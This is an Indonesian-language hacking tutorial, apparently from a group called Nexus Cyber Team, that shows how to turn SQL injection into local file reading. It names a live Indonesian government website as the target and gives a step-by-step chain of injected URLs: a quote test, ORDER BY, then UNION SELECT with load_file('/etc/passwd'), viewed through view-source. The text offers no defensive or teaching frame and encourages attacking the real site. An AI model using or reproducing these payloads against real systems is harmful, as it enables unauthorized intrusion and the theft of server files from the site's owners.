Assalamualaikum
Balik lagi ma gua Noub93 Gans*; Kali ini akan tutor Sql To Lfi
Bahan"
->Payload Lfi load_file('/etc/passwd')
-> Live Target : http://tf.lan.go.id/statis-1-profil.html
Lanjut aja ke tutor nya
Kayak biasa pertama" kita kasih ' untuk cek vuln atau tidak
http://tf.lan.go.id/statis-1'-profil.html
Nah kasih ' nya sesudah angka 1 ye:v
Terus lu searc ke google/crome maka akan menjadi seperti ini
Lalu kalian tambahin order by nya
Contoh : http://tf.lan.go.id/statis-1'+order+by+1--+--profil.html
Maka akan menjadi seperti ini
Nah disini error,lalu langsng aja ganti order by nya menjadi union select
Contoh : http://tf.lan.go.id/statis-1'+union+select--+--profil.html
Hapus aja angka 1 nya
Maka akan menjadi seperti ini
Nah,lalu kalian masukin payload nya
Contoh : http://tf.lan.go.id/statis-1'+union+select+load_file('/etc/passwd')--+--profil.html
Nah maka akan menjadi seperti ini
Nah sudah itu kalian tinggal view-source aja biar muncul hasilnya:v
Contoh : view-source:tf.lan.go.id/statis-1'+union+select+load_file('/etc/passwd')--+--profil.html
Nah maka akan menjadi seperti ini
Duar boom:v
Oke begitu ya
Sekian tutor nya jika ada kesalahan moon maaf:v
Jangan lupa follow ig @nexuscyberteam
ThanksTo : Dark_193N - Akshan - Badboy - Dan all Member NCT
#Nexus Cyber Team